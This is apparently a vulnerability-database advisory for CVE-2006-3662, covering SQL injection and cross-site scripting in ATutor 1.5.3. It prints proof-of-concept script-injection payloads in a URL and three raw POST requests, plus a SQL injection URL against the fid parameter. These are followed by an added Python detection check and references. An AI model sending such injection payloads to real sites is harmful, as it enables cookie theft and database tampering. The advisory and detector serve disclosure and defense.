ATutor 'index.php' SQL Injection Vulnerability

Vulnerability ID: 1110583
Vulnerability type: SQL injection
Published: 2006-07-08
Updated: 2006-07-26
CVE ID: CVE-2006-3662
CNNVD-ID: CNNVD-200607-269
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/28192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-269
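|Vulnerability details
**DISPUTED** A SQL injection vulnerability exists in index.php in ATutor 1.5.3 that allows remote attackers to execute arbitrary SQL commands via the fid parameter. NOTE: the vendor disputes this, stating that "the SQL injection vulnerability mentioned is not possible." However, the relevant source code indicates that the issue may be real, and the parameter is sanitized in 1.5.3.1.
|Exploit (EXP)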
source: http://www.securityfocus.com/bid/18898/info

ATutor is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script>

POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com

ml=1&year="><script>alert(/EllipsisSecurityTest/)</script>

POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com

ml=1&month="><script>alert(/EllipsisSecurityTest/)</script>

POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com

ml=1&day="><script>alert(/EllipsisSecurityTest/)</script>

http://www.example.com/forum/index.php?fid=-1[SQL]
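
A detection check for the requests listed above, as an added example that is not part of the original advisory or of ATutor's code. It flags the parameters the advisory names (fid, lang, year, month, day) when their values do not match an expected shape. The expected shapes (non-negative integers, a short language code) and the function names are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters carry plain non-negative integers in normal use.
INTEGER_PARAMS = {"fid", "year", "month", "day"}
# Assumption: a language code is a short token such as "en" or "zh-CN".
LANG_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,16}")


def check_params(encoded):
    """Return (name, reason) findings for one URL-encoded query string or form body."""
    findings = []
    for name, value in parse_qsl(encoded, keep_blank_values=True):
        if name in INTEGER_PARAMS and value and not re.fullmatch(r"\d+", value):
            findings.append((name, "non-integer value"))
        elif name == "lang" and not LANG_PATTERN.fullmatch(value):
            findings.append((name, "unexpected characters"))
    return findings


def check_request(target, body=""):
    """Check both the query string of the request target and the form body."""
    return check_params(urlsplit(target).query) + check_params(body)


def flag_requests(requests):
    """Return only the (target, body, findings) entries that have findings."""
    flagged = []
    for target, body in requests:
        findings = check_request(target, body)
        if findings:
            flagged.append((target, body, findings))
    return flagged


# Constructed sample requests: (request target, form body).
SAMPLE_REQUESTS = [
    ("/forum/index.php?fid=12", ""),
    ("/forum/index.php?fid=-1[SQL]", ""),
    ("/documentation/index_list.php?lang=en", ""),
    ("/documentation/index_list.php?lang=%22%3E%3Cb%3E", ""),
    ("/registration.php?register=Register", "ml=1&year=1980&month=7&day=8"),
    ("/registration.php?register=Register", "ml=1&year=%22%3E%3Cb%3E"),
]

if __name__ == "__main__":
    for target, body, findings in flag_requests(SAMPLE_REQUESTS):
        print(target, body, findings)
```

The year, month and day values arrive in the POST body, which a standard web-server access log does not record, so this check has to run where the body is visible, such as a WAF or an application-level request log.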
|References

Source: XF
Name: atutor-index-sql-injection (27620)
Link: http://xforce.iss.net/xforce/xfdb/27620
Source: BID
Name: 18898
Link: http://www.securityfocus.com/bid/18898
Source: BUGTRAQ
Name: 20060711 Re: ATutor 1.5.3 Cross Site Scripting
Link: http://www.securityfocus.com/archive/1/archive/1/439873/100/100/threaded
Source: BUGTRAQ
Name: 20060708 ATutor 1.5.3 Cross Site Scripting
Link: http://archives.neohapsis.com/archives/bugtraq/2006-07/0096.html
Source: BUGTRAQ
Name: 20060721 Re: ATutor 1.5.3 Cross Site Scripting
Link: http://www.securityfocus.com/archive/1/archive/1/440837/100/100/threaded
Source: OSVDB
Name: 28188
Link: http://www.osvdb.org/28188